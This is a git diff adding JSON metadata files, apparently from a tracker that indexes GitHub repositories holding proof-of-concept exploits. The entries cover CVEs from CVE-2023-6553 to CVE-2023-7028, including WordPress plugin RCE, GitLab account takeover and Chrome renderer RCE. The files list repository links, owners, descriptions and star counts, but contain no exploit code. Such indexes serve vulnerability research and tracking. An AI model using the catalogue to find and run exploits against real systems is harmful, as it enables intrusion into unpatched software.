b/2023/CVE-2023-6553.json new file mode 100644 index 0000000000..b74aa2e157 --- /dev/null +++ b/2023/CVE-2023-6553.json @@ -0,0 +1,171 @@ +[ + { + "id": 731322134, + "name": "CVE-2023-6553", + "full_name": "Chocapikk\/CVE-2023-6553", + "owner": { + "login": "Chocapikk", + "id": 88535377, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88535377?v=4", + "html_url": "https:\/\/github.com\/Chocapikk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Chocapikk\/CVE-2023-6553", + "description": "Backup Migration <= 1.3.7 - Unauthenticated Remote Code Execution", + "fork": false, + "created_at": "2023-12-13T20:26:59Z", + "updated_at": "2024-12-12T11:23:10Z", + "pushed_at": "2024-02-06T23:22:31Z", + "stargazers_count": 77, + "watchers_count": 77, + "has_discussions": false, + "forks_count": 23, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2023-6553", + "cybersecurity", + "exploit", + "hacking", + "infosec", + "php", + "python", + "rce", + "security", + "security-research", + "vulnerability", + "wordpress" + ], + "visibility": "public", + "forks": 23, + "watchers": 77, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 736295988, + "name": "CVE-2023-6553-PoC", + "full_name": "motikan2010\/CVE-2023-6553-PoC", + "owner": { + "login": "motikan2010", + "id": 3177297, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3177297?v=4", + "html_url": "https:\/\/github.com\/motikan2010", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/motikan2010\/CVE-2023-6553-PoC", + "description": null, + "fork": false, + "created_at": "2023-12-27T14:14:51Z", + "updated_at": "2024-06-26T12:02:15Z", + "pushed_at": "2023-12-27T14:16:07Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 737831693, + "name": "CVE-2023-6553", + "full_name": "kiddenta\/CVE-2023-6553", + "owner": { + "login": "kiddenta", + "id": 128315553, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/128315553?v=4", + "html_url": "https:\/\/github.com\/kiddenta", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kiddenta\/CVE-2023-6553", + "description": null, + "fork": false, + "created_at": "2024-01-01T16:57:17Z", + "updated_at": "2024-05-11T07:09:14Z", + "pushed_at": "2024-05-11T07:09:11Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 821866509, + "name": "CVE-2023-6553", + "full_name": "cc3305\/CVE-2023-6553", + "owner": { + "login": "cc3305", + "id": 103961201, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/103961201?v=4", + "html_url": "https:\/\/github.com\/cc3305", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cc3305\/CVE-2023-6553", + "description": "CVE-2023-6553 exploit script", + "fork": false, + "created_at": "2024-06-29T17:01:51Z", + "updated_at": "2024-07-27T20:20:42Z", + "pushed_at": "2024-07-27T20:20:39Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 884598540, + "name": "CVE-2023-6553", + "full_name": "Harshit-Mashru\/CVE-2023-6553", + "owner": { + "login": "Harshit-Mashru", + "id": 31271975, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/31271975?v=4", + "html_url": "https:\/\/github.com\/Harshit-Mashru", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Harshit-Mashru\/CVE-2023-6553", + "description": "Exploit Development for CVE-2023-6553 on Backup Plugin in Wordpress", + "fork": false, + "created_at": "2024-11-07T03:28:02Z", + "updated_at": "2024-11-07T17:24:08Z", + "pushed_at": "2024-11-07T17:24:04Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-6567.json b/2023/CVE-2023-6567.json new file mode 100644 index 0000000000..8e3efaa9a9 --- /dev/null +++ b/2023/CVE-2023-6567.json @@ -0,0 +1,33 @@ +[ + { + "id": 741790431, + "name": "CVE-2023-6567-poc", + "full_name": "mimiloveexe\/CVE-2023-6567-poc", + "owner": { + "login": "mimiloveexe", + "id": 65785929, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/65785929?v=4", + "html_url": "https:\/\/github.com\/mimiloveexe", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mimiloveexe\/CVE-2023-6567-poc", + "description": "Time-based SQLi", + "fork": false, + "created_at": "2024-01-11T05:43:31Z", + "updated_at": "2024-01-11T05:43:31Z", + "pushed_at": "2024-01-11T05:48:24Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-6595.json b/2023/CVE-2023-6595.json new file mode 100644 index 0000000000..67712436b5 --- /dev/null +++ b/2023/CVE-2023-6595.json @@ -0,0 +1,33 @@ +[ + { + "id": 766048857, + "name": "CVE-2023-6595", + "full_name": "sharmashreejaa\/CVE-2023-6595", + "owner": { + "login": "sharmashreejaa", + "id": 161574704, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/161574704?v=4", + "html_url": "https:\/\/github.com\/sharmashreejaa", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sharmashreejaa\/CVE-2023-6595", + "description": null, + "fork": false, + "created_at": "2024-03-02T07:35:29Z", + "updated_at": "2024-03-02T07:35:29Z", + "pushed_at": "2024-03-02T07:35:29Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-6634.json b/2023/CVE-2023-6634.json new file mode 100644 index 0000000000..11c3f89ba6 --- /dev/null +++ b/2023/CVE-2023-6634.json @@ -0,0 +1,35 @@ +[ + { + "id": 782645537, + "name": "CVE-2023-6634", + "full_name": "krn966\/CVE-2023-6634", + "owner": { + "login": "krn966", + "id": 124454175, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/124454175?v=4", + "html_url": "https:\/\/github.com\/krn966", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/krn966\/CVE-2023-6634", + "description": "CVE-2023-6634", + "fork": false, + "created_at": "2024-04-05T18:07:08Z", + "updated_at": "2024-10-10T14:22:51Z", + "pushed_at": "2024-04-05T19:37:03Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "exploit" + ], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-6654.json b/2023/CVE-2023-6654.json new file mode 100644 index 0000000000..30353567ea --- /dev/null +++ b/2023/CVE-2023-6654.json @@ -0,0 +1,33 @@ +[ + { + "id": 763947006, + "name": "CVE-2023-6654", + "full_name": "qfmy1024\/CVE-2023-6654", + "owner": { + "login": "qfmy1024", + "id": 76994810, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76994810?v=4", + "html_url": "https:\/\/github.com\/qfmy1024", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/qfmy1024\/CVE-2023-6654", + "description": "CVE-2023-6654 EXP", + "fork": false, + "created_at": "2024-02-27T07:50:01Z", + "updated_at": "2024-08-29T16:58:32Z", + "pushed_at": "2024-08-29T16:58:29Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-6661.json b/2023/CVE-2023-6661.json new file mode 100644 index 0000000000..d8c03dfcd6 --- /dev/null +++ b/2023/CVE-2023-6661.json @@ -0,0 +1,33 @@ +[ + { + "id": 735021939, + "name": "CVE-2023-6661", + "full_name": "cli-ish\/CVE-2023-6661", + "owner": { + "login": "cli-ish", + "id": 22986332, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22986332?v=4", + "html_url": "https:\/\/github.com\/cli-ish", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cli-ish\/CVE-2023-6661", + "description": null, + "fork": false, + "created_at": "2023-12-23T11:39:50Z", + "updated_at": "2023-12-23T11:39:51Z", + "pushed_at": "2023-12-23T11:39:51Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-6663.json b/2023/CVE-2023-6663.json new file mode 100644 index 0000000000..760da533db --- /dev/null +++ b/2023/CVE-2023-6663.json @@ -0,0 +1,33 @@ +[ + { + "id": 735021962, + "name": "CVE-2023-6663", + "full_name": "cli-ish\/CVE-2023-6663", + "owner": { + "login": "cli-ish", + "id": 22986332, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22986332?v=4", + "html_url": "https:\/\/github.com\/cli-ish", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cli-ish\/CVE-2023-6663", + "description": null, + "fork": false, + "created_at": "2023-12-23T11:39:57Z", + "updated_at": "2023-12-23T11:39:58Z", + "pushed_at": "2023-12-23T11:39:57Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-6700.json b/2023/CVE-2023-6700.json new file mode 100644 index 0000000000..43f8100bf1 --- /dev/null +++ b/2023/CVE-2023-6700.json @@ -0,0 +1,33 @@ +[ + { + "id": 750276548, + "name": "CVE-2023-6700", + "full_name": "RandomRobbieBF\/CVE-2023-6700", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2023-6700", + "description": "Cookie Information | Free GDPR Consent Solution <= 2.0.22 - Authenticated (Subscriber+) Arbitrary Options Update", + "fork": false, + "created_at": "2024-01-30T10:32:54Z", + "updated_at": "2024-07-11T16:38:26Z", + "pushed_at": "2024-05-21T13:58:37Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-6702.json b/2023/CVE-2023-6702.json new file mode 100644 index 0000000000..7e75fe9724 --- /dev/null +++ b/2023/CVE-2023-6702.json @@ -0,0 +1,33 @@ +[ + { + "id": 809375652, + "name": "CVE-2023-6702", + "full_name": "kaist-hacking\/CVE-2023-6702", + "owner": { + "login": "kaist-hacking", + "id": 74822163, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/74822163?v=4", + "html_url": "https:\/\/github.com\/kaist-hacking", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kaist-hacking\/CVE-2023-6702", + "description": "Chrome Renderer 1day RCE via Type Confusion in Async Stack Trace (v8ctf submission)", + "fork": false, + "created_at": "2024-06-02T14:15:27Z", + "updated_at": "2024-12-19T00:18:04Z", + "pushed_at": "2024-06-03T05:03:46Z", + "stargazers_count": 74, + "watchers_count": 74, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 74, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-6710.json b/2023/CVE-2023-6710.json new file mode 100644 index 0000000000..ad0b1583d3 --- /dev/null +++ b/2023/CVE-2023-6710.json @@ -0,0 +1,64 @@ +[ + { + "id": 735541566, + "name": "Metasploit-Exploits-CVE-2023-6710", + "full_name": "DedSec-47\/Metasploit-Exploits-CVE-2023-6710", + "owner": { + "login": "DedSec-47", + "id": 154718593, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/154718593?v=4", + "html_url": "https:\/\/github.com\/DedSec-47", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/DedSec-47\/Metasploit-Exploits-CVE-2023-6710", + "description": "Welcome to the Metasploit Exploits Repository, your go-to resource for a comprehensive collection of cutting-edge exploits designed for penetration testing and ethical hacking. Developed and maintained by Mohamed Mounir Boudjema, this repository is crafted with a deep understanding of the evolving landscape of cybersecurity.", + "fork": false, + "created_at": "2023-12-25T09:40:31Z", + "updated_at": "2024-01-25T21:47:18Z", + "pushed_at": "2023-12-28T12:23:22Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 735543895, + "name": "CVE-2023-6710", + "full_name": "DedSec-47\/CVE-2023-6710", + "owner": { + "login": "DedSec-47", + "id": 154718593, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/154718593?v=4", + "html_url": "https:\/\/github.com\/DedSec-47", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/DedSec-47\/CVE-2023-6710", + "description": "Explore the depths of CVE-2023-6710 with our comprehensive Proof of Concept (PoC). This CVE, identified as a potential security vulnerability, has been meticulously examined to demonstrate its impact and provide a hands-on understanding of the associated risks.", + "fork": false, + "created_at": "2023-12-25T09:50:23Z", + "updated_at": "2024-01-25T21:47:19Z", + "pushed_at": "2023-12-28T11:29:42Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-6875.json b/2023/CVE-2023-6875.json new file mode 100644 index 0000000000..988918752f --- /dev/null +++ b/2023/CVE-2023-6875.json @@ -0,0 +1,95 @@ +[ + { + "id": 742857167, + "name": "CVE-2023-6875", + "full_name": "UlyssesSaicha\/CVE-2023-6875", + "owner": { + "login": "UlyssesSaicha", + "id": 70921512, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/70921512?v=4", + "html_url": "https:\/\/github.com\/UlyssesSaicha", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/UlyssesSaicha\/CVE-2023-6875", + "description": "CVE-2023-6875 PoC", + "fork": false, + "created_at": "2024-01-13T15:23:17Z", + "updated_at": "2024-11-27T04:39:44Z", + "pushed_at": "2024-01-15T10:58:20Z", + "stargazers_count": 25, + "watchers_count": 25, + "has_discussions": false, + "forks_count": 14, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 14, + "watchers": 25, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 749076546, + "name": "CVE-2023-6875", + "full_name": "gbrsh\/CVE-2023-6875", + "owner": { + "login": "gbrsh", + "id": 36970331, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/36970331?v=4", + "html_url": "https:\/\/github.com\/gbrsh", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/gbrsh\/CVE-2023-6875", + "description": "Exploit for CVE-2023-6875 - Unauthorized Account Takeover. ", + "fork": false, + "created_at": "2024-01-27T14:20:51Z", + "updated_at": "2024-08-30T15:05:04Z", + "pushed_at": "2024-01-27T14:23:46Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 7, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 753010588, + "name": "CVE-2023-6875", + "full_name": "hatlesswizard\/CVE-2023-6875", + "owner": { + "login": "hatlesswizard", + "id": 123577653, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/123577653?v=4", + "html_url": "https:\/\/github.com\/hatlesswizard", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hatlesswizard\/CVE-2023-6875", + "description": "CVE-2023-6875 exploit written for Xakep.Ru", + "fork": false, + "created_at": "2024-02-05T09:44:35Z", + "updated_at": "2024-02-05T09:45:06Z", + "pushed_at": "2024-02-05T10:14:44Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-6895.json b/2023/CVE-2023-6895.json new file mode 100644 index 0000000000..33d6e87899 --- /dev/null +++ b/2023/CVE-2023-6895.json @@ -0,0 +1,64 @@ +[ + { + "id": 744508630, + "name": "CVE-2023-6895", + "full_name": "FuBoLuSec\/CVE-2023-6895", + "owner": { + "login": "FuBoLuSec", + "id": 156916644, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/156916644?v=4", + "html_url": "https:\/\/github.com\/FuBoLuSec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/FuBoLuSec\/CVE-2023-6895", + "description": null, + "fork": false, + "created_at": "2024-01-17T12:53:47Z", + "updated_at": "2024-07-07T02:54:16Z", + "pushed_at": "2024-01-21T07:39:36Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 754039197, + "name": "CVE-2023-6895", + "full_name": "nles-crt\/CVE-2023-6895", + "owner": { + "login": "nles-crt", + "id": 61862786, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61862786?v=4", + "html_url": "https:\/\/github.com\/nles-crt", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nles-crt\/CVE-2023-6895", + "description": null, + "fork": false, + "created_at": "2024-02-07T09:28:10Z", + "updated_at": "2024-02-17T05:16:07Z", + "pushed_at": "2024-02-07T09:32:27Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-6931.json b/2023/CVE-2023-6931.json new file mode 100644 index 0000000000..23ed60d0b8 --- /dev/null +++ b/2023/CVE-2023-6931.json @@ -0,0 +1,33 @@ +[ + { + "id": 912223220, + "name": "CVE-2023-6931", + "full_name": "K0n9-log\/CVE-2023-6931", + "owner": { + "login": "K0n9-log", + "id": 102219883, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102219883?v=4", + "html_url": "https:\/\/github.com\/K0n9-log", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/K0n9-log\/CVE-2023-6931", + "description": "CVE-2023-6931 kernel panic PoC", + "fork": false, + "created_at": "2025-01-05T00:28:28Z", + "updated_at": "2025-01-06T19:31:39Z", + "pushed_at": "2025-01-06T19:31:35Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-6933.json b/2023/CVE-2023-6933.json new file mode 100644 index 0000000000..e714e2b005 --- /dev/null +++ b/2023/CVE-2023-6933.json @@ -0,0 +1,33 @@ +[ + { + "id": 749563403, + "name": "CVE-2023-6933", + "full_name": "w2xim3\/CVE-2023-6933", + "owner": { + "login": "w2xim3", + "id": 91914344, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/91914344?v=4", + "html_url": "https:\/\/github.com\/w2xim3", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/w2xim3\/CVE-2023-6933", + "description": "Introduction to CVE-2023-6933 Vulnerability", + "fork": false, + "created_at": "2024-01-28T23:16:53Z", + "updated_at": "2024-01-29T02:26:33Z", + "pushed_at": "2024-01-29T02:34:01Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-6985.json b/2023/CVE-2023-6985.json new file mode 100644 index 0000000000..b65bf1267f --- /dev/null +++ b/2023/CVE-2023-6985.json @@ -0,0 +1,37 @@ +[ + { + "id": 749919472, + "name": "CVE-2023-6985", + "full_name": "RandomRobbieBF\/CVE-2023-6985", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2023-6985", + "description": "10Web AI Assistant – AI content writing assistant <= 1.0.18 - Missing Authorization to Authenticated (Subscriber+) Arbitrary Plugin Installation\/Activation Description", + "fork": false, + "created_at": "2024-01-29T16:51:53Z", + "updated_at": "2024-07-11T16:39:17Z", + "pushed_at": "2024-01-29T16:54:24Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "ai-assistant-by-10web", + "cve-2023-6985", + "wordpress" + ], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-7016.json b/2023/CVE-2023-7016.json new file mode 100644 index 0000000000..f4577b04eb --- /dev/null +++ b/2023/CVE-2023-7016.json @@ -0,0 +1,33 @@ +[ + { + "id": 764138202, + "name": "CVE-2023-7016-POC", + "full_name": "ewilded\/CVE-2023-7016-POC", + "owner": { + "login": "ewilded", + "id": 1158719, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1158719?v=4", + "html_url": "https:\/\/github.com\/ewilded", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ewilded\/CVE-2023-7016-POC", + "description": "POC for the flaw in Thales SafeNet Authentication Client prior to 10.8 R10 on Windows that allows an attacker to execute code at a SYSTEM level via local access.", + "fork": false, + "created_at": "2024-02-27T14:48:19Z", + "updated_at": "2024-02-27T14:50:26Z", + "pushed_at": "2024-02-27T14:50:21Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-7028.json b/2023/CVE-2023-7028.json new file mode 100644 index 0000000000..c0204fd36b --- /dev/null +++ b/2023/CVE-2023-7028.json @@ -0,0 +1,411 @@ +[ + { + "id": 742381856, + "name": "CVE-2023-7028", + "full_name": "RandomRobbieBF\/CVE-2023-7028", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2023-7028", + "description": "CVE-2023-7028", + "fork": false, + "created_at": "2024-01-12T10:53:50Z", + "updated_at": "2024-08-09T10:03:25Z", + "pushed_at": "2024-01-12T13:56:38Z", + "stargazers_count": 58, + "watchers_count": 58, + "has_discussions": false, + "forks_count": 11, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2023-7028", + "gitlab" + ], + "visibility": "public", + "forks": 11, + "watchers": 58, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 742443954, + "name": "CVE-2023-7028", + "full_name": "googlei1996\/CVE-2023-7028", + "owner": { + "login": "googlei1996", + "id": 101400530, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/101400530?v=4", + "html_url": "https:\/\/github.com\/googlei1996", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/googlei1996\/CVE-2023-7028", + "description": "CVE-2023-7028 poc", + "fork": false, + "created_at": "2024-01-12T13:47:37Z", + "updated_at": "2024-01-12T13:47:37Z", + "pushed_at": "2024-01-12T08:58:23Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 742480461, + "name": "CVE-2023-7028", + "full_name": "duy-31\/CVE-2023-7028", + "owner": { + "login": "duy-31", + "id": 20819326, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20819326?v=4", + "html_url": "https:\/\/github.com\/duy-31", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/duy-31\/CVE-2023-7028", + "description": "An issue has been discovered in GitLab CE\/EE affecting all versions from 16.1 prior to 16.1.6, 16.2 prior to 16.2.9, 16.3 prior to 16.3.7, 16.4 prior to 16.4.5, 16.5 prior to 16.5.6, 16.6 prior to 16.6.4, and 16.7 prior to 16.7.2 in which user account password reset emails could be delivered to an unverified email address.", + "fork": false, + "created_at": "2024-01-12T15:17:59Z", + "updated_at": "2024-08-12T20:33:09Z", + "pushed_at": "2024-01-12T20:18:04Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 3, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 742554037, + "name": "CVE-2023-7028", + "full_name": "Vozec\/CVE-2023-7028", + "owner": { + "login": "Vozec", + "id": 61807609, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61807609?v=4", + "html_url": "https:\/\/github.com\/Vozec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Vozec\/CVE-2023-7028", + "description": "This repository presents a proof-of-concept of CVE-2023-7028", + "fork": false, + "created_at": "2024-01-12T18:29:27Z", + "updated_at": "2025-01-01T17:53:49Z", + "pushed_at": "2024-01-13T13:50:20Z", + "stargazers_count": 238, + "watchers_count": 238, + "has_discussions": false, + "forks_count": 42, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 42, + "watchers": 238, + "score": 0, + "subscribers_count": 6 + }, + { + "id": 744835323, + "name": "CVE-2023-7028", + "full_name": "yoryio\/CVE-2023-7028", + "owner": { + "login": "yoryio", + "id": 134471901, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/134471901?v=4", + "html_url": "https:\/\/github.com\/yoryio", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/yoryio\/CVE-2023-7028", + "description": "Exploit for CVE-2023-7028 - GitLab CE\/EE", + "fork": false, + "created_at": "2024-01-18T05:17:00Z", + "updated_at": "2024-12-19T04:12:19Z", + "pushed_at": "2024-12-19T04:12:15Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2023-7028", + "gitlab" + ], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 744940880, + "name": "gitlab_honeypot", + "full_name": "Esonhugh\/gitlab_honeypot", + "owner": { + "login": "Esonhugh", + "id": 32677240, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32677240?v=4", + "html_url": "https:\/\/github.com\/Esonhugh", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Esonhugh\/gitlab_honeypot", + "description": "CVE-2023-7028 killer", + "fork": false, + "created_at": 